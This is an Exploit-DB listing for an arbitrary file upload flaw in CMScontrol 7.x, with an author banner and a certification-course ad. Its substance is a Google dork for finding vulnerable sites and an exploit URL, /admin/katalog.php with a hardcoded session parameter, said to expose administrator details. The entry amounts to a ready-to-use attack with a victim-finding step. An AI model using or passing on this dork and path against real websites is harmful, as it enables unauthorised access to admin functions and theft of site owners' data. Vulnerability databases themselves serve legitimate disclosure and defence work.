CMScontrol 7.x - Arbitrary File Upload

EDB-ID:

11104

CVE:

N/A




Platform:

PHP

Date:

2010-01-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#############################################################
#            CMScontrol 7.x File Upload                     #
#############################################################
# Author          : Cyber_945
# Home            : Ar-ge.Org
# Greetz          : D3xer and All Ar-ge.Org Members
# Not3            : Ar-ge.Org Online
# Name            : CMScontrol 7.x File Upload
# Bug Type        : File Upload
# Infection       : Adminin bilgileri alinabilir.
# Dork            : inurl:"index.php?id_menu="

#############################################################
=======================C=y=b=e=r=_=9=4=5================
<-- bug code start -- >

Exploit           : /admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

Server            : http://server/admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

=======================C=y=b=e=r=_=9=4=5================